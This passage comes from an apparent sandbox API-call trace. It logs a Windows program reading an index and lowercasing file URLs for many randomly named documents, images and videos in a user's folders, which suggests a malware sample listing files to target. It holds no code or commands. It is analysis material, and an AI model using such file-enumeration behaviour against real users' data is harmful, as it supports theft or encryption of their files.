returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf" [0085.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned 65 [0085.749] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.749] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.749] SetFilePointer (in: hFile=0x9c, lDistanceToMove=30976, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7900 [0085.749] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.749] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/kaPjDJpM0.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif" [0085.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned 65 [0085.749] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.749] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.749] SetFilePointer (in: hFile=0x9c, lDistanceToMove=31232, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7a00 [0085.749] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.749] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/qah0Uzv-.ppt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt" [0085.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned 64 [0085.749] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.749] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.750] SetFilePointer (in: hFile=0x9c, lDistanceToMove=31488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7b00 [0085.750] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.750] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/rCa29oK1R73tia22zN.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv" [0085.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned 65 [0085.750] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.750] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.750] SetFilePointer (in: hFile=0x9c, lDistanceToMove=31744, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c00 [0085.750] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.750] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/KO7vfyUf_S9dMC.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp" [0085.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned 62 [0085.750] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.750] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.750] SetFilePointer (in: hFile=0x9c, lDistanceToMove=32000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d00 [0085.750] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.750] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/3I2Irr0cMCLAX.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf" [0085.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned 101 [0085.750] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.750] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.750] SetFilePointer (in: hFile=0x9c, lDistanceToMove=32256, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7e00 [0085.750] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.750] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/mTGRgfoDAYRAe.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png" [0085.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned 69 [0085.751] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.751] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.751] SetFilePointer (in: hFile=0x9c, lDistanceToMove=32512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f00 [0085.751] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.751] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/F-0YO_9NEEJgd78f.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx" [0085.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned 67 [0085.751] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.751] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.751] SetFilePointer (in: hFile=0x9c, lDistanceToMove=32768, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8000 [0085.751] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.751] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/cWMCE43U6A.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png" [0085.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned 75 [0085.751] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.751] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.751] SetFilePointer (in: hFile=0x9c, lDistanceToMove=33024, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8100 [0085.751] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.751] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/AbD4ADF.doc" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc" [0085.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned 57 [0085.751] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.751] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.751] SetFilePointer (in: hFile=0x9c, lDistanceToMove=33280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8200 [0085.751] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.752] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/6ajwk7gtt_t6-1WJ3G.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp" [0085.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned 83 [0085.752] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.752] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.752] SetFilePointer (in: hFile=0x9c, lDistanceToMove=33536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8300 [0085.752] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.752] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/zH5oR54.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg" [0085.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned 120 [0085.752] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.752] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.752] SetFilePointer (in: hFile=0x9c, lDistanceToMove=33920, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8480 [0085.752] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.752] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/GYuIx6oheT.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf" [0085.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned 65 [0085.752] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.752] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.752] SetFilePointer (in: hFile=0x9c, lDistanceToMove=34176, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8580 [0085.752] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.752] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/49GDy95-0C.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv" [0085.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned 65 [0085.752] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.753] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.753] SetFilePointer (in: hFile=0x9c, lDistanceToMove=34432, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8680 [0085.753] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.753] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/HDFQW%20QK5sILpA%20IO/wAL.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif" [0085.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned 133 [0085.753] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.753] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.753] SetFilePointer (in: hFile=0x9c, lDistanceToMove=34816, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8800 [0085.753] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.753] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/FrPgv.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx" [0085.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned 56 [0085.753] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.753] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.753] SetFilePointer (in: hFile=0x9c, lDistanceToMove=35072, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8900 [0085.753] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.753] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/N0tkYSumLl.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt" [0085.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned 98 [0085.753] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.753] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.753] SetFilePointer (in: hFile=0x9c, lDistanceToMove=35328, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8a00 [0085.754] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.754] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/AtBj.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png" [0085.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned 69 [0085.754] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.754] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.754] SetFilePointer (in: hFile=0x9c, lDistanceToMove=35584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8b00 [0085.754] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x180, lpOverlapped=0x0) returned 1 [0085.754] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/PaSZghjjdkTQmQ.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png" [0085.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned 122 [0085.754] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.754] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.754] SetFilePointer (in: hFile=0x9c, lDistanceToMove=35968, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8c80 [0085.754] ReadFile (in: 